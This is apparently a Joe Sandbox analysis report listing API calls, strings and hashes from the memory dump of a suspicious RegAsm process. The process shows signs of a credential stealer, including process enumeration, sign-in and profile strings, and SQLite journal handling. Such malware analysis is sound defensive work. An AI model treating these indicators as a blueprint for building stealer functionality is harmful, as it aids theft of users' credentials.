                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Library$FreeLoadMessage
                                                                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                • API String ID: 3897320386-317687271
                                                                                                                                                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                • API String ID: 4271163124-70141382
                                                                                                                                                                                                • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                • API String ID: 4139908857-3953557276
                                                                                                                                                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                                • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                                • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                                • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                • String ID: -journal$-wal
                                                                                                                                                                                                • API String ID: 438689982-2894717839
                                                                                                                                                                                                • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                                                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                                                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3975816621-0
                                                                                                                                                                                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                • API String ID: 1214746602-2708368587
                                                                                                                                                                                                • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2313361498-0
                                                                                                                                                                                                • Opcode ID: 6be8936133b9872846cd53c6fbf8727739f7c5809b7a21bfe8b407a08affae9f
                                                                                                                                                                                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6be8936133b9872846cd53c6fbf8727739f7c5809b7a21bfe8b407a08affae9f
                                                                                                                                                                                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2047574939-0
                                                                                                                                                                                                • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4218492932-0
                                                                                                                                                                                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                • String ID: gj
                                                                                                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                                                                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3212833200-0
                                                                                                                                                                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                • API String ID: 3510742995-2446657581
                                                                                                                                                                                                • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4281309102-0
                                                                                                                                                                                                • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                                                                                                • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                                                                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                • String ID: 6$\
                                                                                                                                                                                                • API String ID: 404372293-1284684873
                                                                                                                                                                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AttributesErrorFileLastSleep$free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1470729244-0
                                                                                                                                                                                                • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                                                                                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                                                                                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1331804452-0
                                                                                                                                                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • <%s>, xrefs: 004100A6
                                                                                                                                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                                                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
